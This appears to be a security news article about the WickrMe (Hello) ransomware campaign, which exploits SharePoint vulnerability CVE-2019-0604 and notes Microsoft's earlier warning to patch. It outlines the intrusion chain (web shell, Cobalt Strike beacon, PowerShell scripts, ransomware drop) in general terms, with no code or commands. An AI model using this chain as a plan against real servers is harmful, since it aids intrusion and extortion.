WickrMe Ransomware

A new ransomware operation has begun targeting Microsoft SharePoint servers, marking the first time that this particular entry point has been used to infiltrate private corporate networks and deploy ransomware. Previous targets of similar campaigns have been Microsoft Exchange email servers, Citrix gateways, F5 BIG-IP load balancers, and VPN products released by Pulse Secure, Fortinet and Palo Alto Network.

The attack campaign is being tracked by security vendors as the WickrMe Ransomware (Hello) due to the use of Wickr encrypted IM accounts as part of the communication channels that victims can use to reach the cybercriminals. The initial compromise vector exploited by the WickMe Ransomware is a known vulnerability (CVE-2019-0604) affecting Microsoft's SharePoint team collaboration servers. The exploit allows the threat actor to establish control over the SharePoint server and deliver a corrupted Web shell. The next step involves creating a backdoor by installing a Cobalt Strike beacon. The hackers can then run automated PowerShell scripts that will ultimately drop and execute the final payload - the Hello Ransomware threat, on the compromised systems. 

Companies were Warned about the Exploit

Last year, Microsoft released a blog post, addressing the significant increase in observed attack campaigns that targeted vulnerabilities in networking devices as gateways for the delivery of ransomware threats. Among the specific vulnerabilities mentioned in the article was also CVE-2019-0604. Microsoft urges companies to patch the collection of exploits that they believed could soon be targeted by ransomware groups.

The same SharePoint server bug was exploited by in campaigns launched by cybercriminals, state-sponsored espionage groups, and APTs (Advanced Persistent Threats) previously.